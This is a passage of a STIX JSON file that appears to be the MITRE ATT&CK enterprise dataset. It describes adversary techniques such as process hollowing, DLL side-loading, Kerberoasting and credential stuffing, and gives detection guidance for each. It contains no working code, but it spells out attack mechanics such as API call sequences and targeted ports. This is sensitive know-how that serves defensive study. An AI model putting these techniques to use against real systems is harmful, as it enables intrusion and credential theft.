"http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "DLL Side-Loading", "description": "Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests (Citation: MSDN Manifests) are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL. (Citation: Stewart 2014)\n\nAdversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track DLL metadata, such as a hash, and compare DLLs that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["Process whitelisting", "Anti-virus"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b2001907-166b-4d71-bb3c-9d26c871de09", "created": "2017-05-31T21:30:58.007Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1073", "external_id": "T1073"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/641.html", "external_id": "CAPEC-641"}, {"source_name": "MSDN Manifests", "description": "Microsoft. (n.d.). Manifests. Retrieved June 3, 2016.", "url": "https://msdn.microsoft.com/en-us/library/aa375365"}, {"source_name": "Stewart 2014", "description": "Stewart, A. (2014). DLL SIDE-LOADING: A Thorn in the Side of the Anti-Virus Industry. Retrieved November 12, 2014.", "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-08-11T21:37:00.009Z", "name": "Process Hollowing", "description": "Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process. \n\nProcess hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as CreateProcess, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection before being written to, realigned to the injected code, and resumed via VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017)\n\nThis is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nProcessing hollowing commonly involves spawning an otherwise benign victim process. Consider correlating detections of processes created in a suspended state (ex: through API flags or process\u2019 thread metadata) with other malicious activity such as attempts to modify a process' memory, especially by its parent process, or other abnormal process behavior.(Citation: Nviso Spoof Command Line 2020)(Citation: Mandiant Endpoint Evading 2019)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Application control", "Anti-virus"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4", "created": "2020-01-14T17:21:54.470Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1055/012", "external_id": "T1055.012"}, {"source_name": "Nviso Spoof Command Line 2020", "description": "Daman, R. (2020, February 4). The return of the spoof part 2: Command line spoofing. Retrieved November 19, 2021.", "url": "https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/"}, {"source_name": "Elastic Process Injection July 2017", "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"}, {"source_name": "Leitch Hollowing", "description": "Leitch, J. (n.d.). Process Hollowing. Retrieved November 12, 2014.", "url": "http://www.autosectools.com/process-hollowing.pdf"}, {"source_name": "Mandiant Endpoint Evading 2019", "description": "Pena, E., Erikson, C. (2019, October 10). Staying Hidden on the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.", "url": "https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-31T14:00:00.188Z", "name": "Exploitation for Privilege Escalation", "description": "Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.\n\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.\n\nAdversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) or [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics", "Yaniv Agman, @AgmanYaniv, Team Nautilus Aqua Security", "Idan Revivo, @idanr86, Team Nautilus Aqua Security", "David Tayouri"], "x_mitre_deprecated": false, "x_mitre_detection": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery. Consider monitoring for the presence or loading (ex: Sysmon Event ID 6) of known vulnerable drivers that adversaries may drop and exploit to execute code in kernel mode.(Citation: Microsoft Driver Block Rules)\n\nHigher privileges are often necessary to perform additional actions such as some methods of [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Look for additional activity that may indicate an adversary has gained higher privileges.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Containers"], "x_mitre_version": "1.5", "x_mitre_data_sources": [], "x_mitre_effective_permissions": ["User"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839", "created": "2017-05-31T21:30:55.066Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1068", "external_id": "T1068"}, {"source_name": "ESET InvisiMole June 2020", "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.", "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf"}, {"source_name": "Microsoft Driver Block Rules", "description": "Microsoft. (2020, October 15). Microsoft recommended driver block rules. Retrieved March 16, 2021.", "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules"}, {"source_name": "Unit42 AcidBox June 2020", "description": "Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021.", "url": "https://unit42.paloaltonetworks.com/acidbox-rare-malware/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-24T14:00:00.188Z", "name": "Resource Forking", "description": "Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file\u2019s extended attributes, using ls -l@ or xattr -l commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)\n\nAdversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Jaron Bradley @jbradley89", "Ivan Sinyakov"], "x_mitre_deprecated": false, "x_mitre_detection": "Identify files with the com.apple.ResourceFork extended attribute and large data amounts stored in resource forks. \n\nMonitor command-line activity leveraging the use of resource forks, especially those immediately followed by potentially malicious activity such as creating network connections. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Notarization", "Gatekeeper"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b22e5153-ac28-4cc6-865c-2054e36285cb", "created": "2021-10-12T20:02:31.866Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1564/009", "external_id": "T1564.009"}, {"source_name": "tau bundlore erika noerenberg 2020", "description": "Erika Noerenberg. (2020, June 29). TAU Threat Analysis: Bundlore (macOS) mm-install-macos. Retrieved October 12, 2021.", "url": "https://blogs.vmware.com/security/2020/06/tau-threat-analysis-bundlore-macos-mm-install-macos.html"}, {"source_name": "Resource and Data Forks", "description": "Flylib. (n.d.). Identifying Resource and Data Forks. Retrieved October 12, 2021.", "url": "https://flylib.com/books/en/4.395.1.192/1/"}, {"source_name": "ELC Extended Attributes", "description": "Howard Oakley. (2020, October 24). There's more to files than data: Extended Attributes. Retrieved October 12, 2021.", "url": "https://eclecticlight.co/2020/10/24/theres-more-to-files-than-data-extended-attributes/"}, {"source_name": "sentinellabs resource named fork 2020", "description": "Phil Stokes. (2020, November 5). Resourceful macOS Malware Hides in Named Fork. Retrieved October 12, 2021.", "url": "https://www.sentinelone.com/labs/resourceful-macos-malware-hides-in-named-fork/"}, {"source_name": "macOS Hierarchical File System Overview", "description": "Tenon. (n.d.). Retrieved October 12, 2021.", "url": "http://tenon.com/products/codebuilder/User_Guide/6_File_Systems.html#anchor520553"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Account Access Removal", "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)\n\nIn Windows, [Net](https://attack.mitre.org/software/S0039) utility, Set-LocalUser and Set-ADAccountPassword [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. In Linux, the passwd utility may be used to change passwords. Accounts could also be disabled by Group Policy. \n\nAdversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), in order to impede incident response/recovery before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Hubert Mank"], "x_mitre_deprecated": false, "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:\n\n* Event ID 4723 - An attempt was made to change an account's password\n* Event ID 4724 - An attempt was made to reset an account's password\n* Event ID 4726 - A user account was deleted\n* Event ID 4740 - A user account was locked out\n\nAlerting on [Net](https://attack.mitre.org/software/S0039) and these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Office 365", "SaaS"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Availability"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b24e2a20-3b3d-4bf0-823b-1ed765398fb0", "created": "2019-10-09T18:48:31.906Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1531", "external_id": "T1531"}, {"source_name": "CarbonBlack LockerGoga 2019", "description": "CarbonBlack Threat Analysis Unit. (2019, March 22). TAU Threat Intelligence Notification \u2013 LockerGoga Ransomware. Retrieved April 16, 2019.", "url": "https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/"}, {"source_name": "Unit42 LockerGoga 2019", "description": "Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.", "url": "https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-03-07T14:28:02.910Z", "name": "Credential Stuffing", "description": "Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.\n\nCredential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.\n\nTypically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Diogo Fernandes", "Anastasios Pingios"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Azure AD", "Office 365", "SaaS", "IaaS", "Linux", "macOS", "Google Workspace", "Containers", "Network"], "x_mitre_version": "1.5", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", "created": "2020-02-11T18:39:59.959Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1110/004", "external_id": "T1110.004"}, {"source_name": "US-CERT TA18-068A 2018", "description": "US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.", "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Kerberoasting", "description": "Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service (Citation: Microsoft Detecting Kerberoasting Feb 2018)). (Citation: Microsoft SPN) (Citation: Microsoft SetSPN) (Citation: SANS Attacking Kerberos Nov 2014) (Citation: Harmj0y Kerberoast Nov 2016)\n\nAdversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC). (Citation: Empire InvokeKerberoast Oct 2016) (Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials. (Citation: AdSecurity Cracking Kerberos Dec 2015) (Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)\n\nThis same attack could be executed using service tickets captured from network traffic. (Citation: AdSecurity Cracking Kerberos Dec 2015)\n\nCracked hashes may enable Persistence, Privilege Escalation, and Lateral Movement via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078). (Citation: SANS Attacking Kerberos Nov 2014)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Praetorian"], "x_mitre_detection": "Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]). (Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["User"], "x_mitre_system_requirements": ["Valid domain account or the ability to sniff traffic within a domain."], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b39d03cb-7b98-41c4-a878-c40c1a913dc0", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1208", "external_id": "T1208"}, {"source_name": "Microsoft Detecting Kerberoasting Feb 2018", "description": "Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018.", "url": "https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/"}, {"source_name": "Microsoft SPN", "description": "Microsoft. (n.d.). Service Principal Names. Retrieved March 22, 2018.", "url": "https://msdn.microsoft.com/library/ms677949.aspx"}, {"source_name": "Microsoft SetSPN", "description": "Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN Syntax (Setspn.exe). Retrieved March 22, 2018.", "url": "https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx"}, {"source_name": "SANS Attacking Kerberos Nov 2014", "description": "Medin, T. (2014, November). Attacking Kerberos - Kicking the Guard Dog of Hades. Retrieved March 22, 2018.", "url": "https://redsiege.com/kerberoast-slides"}, {"source_name": "Harmj0y Kerberoast Nov 2016", "description": "Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz. Retrieved March 23, 2018.", "url": "https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/"}, {"source_name": "Empire InvokeKerberoast Oct 2016", "description": "EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved March 22, 2018.", "url": "https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1"}, {"source_name": "AdSecurity Cracking Kerberos Dec 2015", "description": "Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast \u2013 Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.", "url": "https://adsecurity.org/?p=2293"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2024-04-16T12:27:18.945Z", "name": "Obfuscated Files or Information", "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. \n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Red Canary", "Christiaan Beek, @ChristiaanBeek"], "x_mitre_deprecated": false, "x_mitre_detection": "Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system). \n\nFlag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''\"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016) \n\nObfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection. \n\nThe first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.6", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Host Forensic Analysis", "Signature-based Detection", "Host Intrusion Prevention Systems", "Application Control", "Log Analysis"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "created": "2017-05-31T21:30:32.662Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1027", "external_id": "T1027"}, {"source_name": "Volexity PowerDuke November 2016", "description": "Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.", "url": "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/"}, {"source_name": "GitHub Revoke-Obfuscation", "description": "Bohannon, D. (2017, July 27). Revoke-Obfuscation. Retrieved February 12, 2018.", "url": "https://github.com/danielbohannon/Revoke-Obfuscation"}, {"source_name": "FireEye Obfuscation June 2017", "description": "Bohannon, D. & Carr N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018.", "url": "https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html"}, {"source_name": "FireEye Revoke-Obfuscation July 2017", "description": "Bohannon, D. & Holmes, L. (2017, July 27). Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science. Retrieved February 12, 2018.", "url": "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf"}, {"source_name": "GitHub Office-Crackros Aug 2016", "description": "Carr, N. (2016, August 14). OfficeCrackros. Retrieved February 12, 2018.", "url": "https://github.com/itsreallynick/office-crackros"}, {"source_name": "Linux/Cdorked.A We Live Security Analysis", "description": "Pierre-Marc Bureau. (2013, April 26). Linux/Cdorked.A: New Apache backdoor being used in the wild to serve Blackhole. Retrieved September 10, 2017.", "url": "https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/"}, {"source_name": "Carbon Black Obfuscation Sept 2016", "description": "Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved February 12, 2018.", "url": "https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/"}, {"source_name": "PaloAlto EncodedCommand March 2017", "description": "White, J. (2017, March 10). Pulling Back the Curtains on EncodedCommand PowerShell Attacks. Retrieved February 12, 2018.", "url": "https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-16T00:20:21.488Z", "name": "Multi-Factor Authentication", "description": "Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce adversaries have gained access to a network by either compromising an account lacking MFA or by employing an 